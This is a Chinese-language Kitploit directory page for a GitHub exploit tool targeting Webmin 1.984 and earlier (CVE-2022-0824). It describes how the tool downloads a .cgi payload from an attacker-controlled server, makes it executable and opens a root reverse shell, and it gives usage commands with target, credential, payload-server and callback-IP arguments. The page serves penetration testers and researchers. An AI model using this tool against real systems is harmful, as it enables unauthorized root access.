Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Webmin-CVE-2022-0824-revshell — 针对Webmin <=1.984的认证后反向Shell漏洞利用,利用CVE-2022-0824文件管理器权限提升。下载并执行CGI有效载荷以获取root访问权限。 | Kitploit
工具/GitHubGitHub/faisalfs10x/webmin-cve-2022-0824-revshell
权限提升Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubfaisalfs10x/webmin-cve-2022-0824-revshell

Webmin-CVE-2022-0824-revshell

针对Webmin <=1.984的认证后反向Shell漏洞利用,利用CVE-2022-0824文件管理器权限提升。下载并执行CGI有效载荷以获取root访问权限。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
11133574年前Kitploit 审核通过

Webmin-CVE-2022-0824-revshell

漏洞描述

Webmin 1.984 及以下版本 - 文件管理器权限利用漏洞(CVE-2022-0824 和 CVE-2022-0829)
在默认使用 Authentic 主题的情况下,仅拥有较低权限且未配置任何文件管理器模块限制的 Webmin 用户,可访问具有 root 权限的文件。所有包含不受信任的 Webmin 用户的系统应立即升级。请注意,Virtualmin 系统不受此漏洞影响,因为其域所有者 Webmin 用户的配置方式不同。
来源:https://www.webmin.com/security.html

利用描述

此漏洞利用文件管理器中的后认证不当访问控制漏洞。任何拥有较低权限的已认证攻击者均可利用该漏洞。它会从攻击者控制的远程服务器下载一个 .cgi 文件,并将其权限修改为全局可执行文件。完成后,将执行该 .cgi 文件,以 root 权限建立与攻击者控制服务器的反向连接。

参考链接:https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/

使用方法

$~ python3 Webmin-revshell.py -t [TARGET] -c [CREDENTIAL] -LS [PY3HTTP_SERVER] -L [CALLBACK_IP] -P [CALLBACK_PORT]
$~ python3 Webmin-revshell.py -t https://192.168.5.118:10000 -c user:user123 -LS 192.168.5.120:9090 -L 192.168.5.120 -P 4444

$~  python3 Webmin-revshell.py -h                                                                                                                                    
    usage: Webmin-revshell.py [-h] -t TARGET -c CREDENTIAL -LS PY3HTTP_SERVER -L CALLBACK_IP -P CALLBACK_PORT [-V]

    Webmin CVE-2022-0824 Reverse Shell

    optional arguments:
      -h, --help            show this help message and exit
      -t TARGET, --target TARGET
                            Target full URL, https://www.webmin.local:10000
      -c CREDENTIAL, --credential CREDENTIAL
                            Format, user:user123
      -LS PY3HTTP_SERVER, --py3http_server PY3HTTP_SERVER
                            Http server for serving payload, ex 192.168.5.120:8080
      -L CALLBACK_IP, --callback_ip CALLBACK_IP
                            Callback IP to receive revshell
      -P CALLBACK_PORT, --callback_port CALLBACK_PORT
                            Callback port to receive revshell
      -V, --version         show program's version number and exit

PoC

目标主机:https://192.168.5.118:10000
攻击者主机:192.168.5.120

https://user-images.githubusercontent.com/51811615/156904265-80c2ee4f-8447-41cd-9197-446bf6555e25.mp4

测试环境

- Webmin 1.984
- Ubuntu 18.04
- Kali 2021.3

免责声明:

该脚本仅供安全分析和研究使用,因此如果被用于非法活动,本人概不负责。
下载工具